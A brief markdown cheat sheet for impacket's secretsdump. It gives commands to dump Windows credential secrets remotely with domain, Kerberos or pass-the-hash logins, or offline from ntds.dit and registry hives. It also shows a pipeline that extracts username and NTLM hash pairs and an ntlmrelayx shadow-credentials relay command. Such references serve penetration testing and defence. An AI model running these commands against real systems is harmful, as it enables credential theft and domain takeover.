# secretsdump
secretsdump is part of [impacket](https://github.com/fortra/impacket).

## Dump secrets using a domain account
```
secretsdump.py domain.com/user VICTIM
```

## Dump secrets using Kerberos
```
secretsdump.py -k -no-pass VICTIM -debug
```

## Dump secrets using a local admin account
```
secretsdump.py localhost/administrator@host -hashes x:y
```

## Dump secrets out of a ntds.dit file locally
```
./secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL -outputfile MYOUTPUTFILE
```
*Note: don't put `.ntds` extension on the end of `MYOUTPUTFILE`.*

## Dump secrets out of a ntds.dit file locally (with history included)
```
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile customername-dump -history
```
*Note: don't put `.ntds` extension on the end of `MYOUTPUTFILE`.*

## Parsing a domain's secretsdump outputfile to extract a file with just usernames and hashes while ignoring machines
```
cat 7MS-DC01_192.168.77.7_2022-12-27_164828.ntds | cut -d ':' -f 1,4 | grep -v '\$' | sed 's/domain.com\\//' | sort 
```

## Run secretsdump in docker
```
docker run -it --rm "impacket:latest"
 ```
  
### Run with exposed ports 
```
sudo docker run -it --rm -p 80:80 -p 445:445 -p 443:443 "impacket:latest"
/opt/venv/bin # ./ntlmrelayx.py -t ldap://1.2.3.4 --shadow-credentials
```

## Secretsdump references
Here are some articles that are really awesome to understand secretsdump and it's output:
* [Secretsdump demystified](https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b)
* [Windows Services passwords stored in the LSA - by Podalirius](https://podalirius.net/en/articles/windows-services-passwords-stored-in-the-lsa/)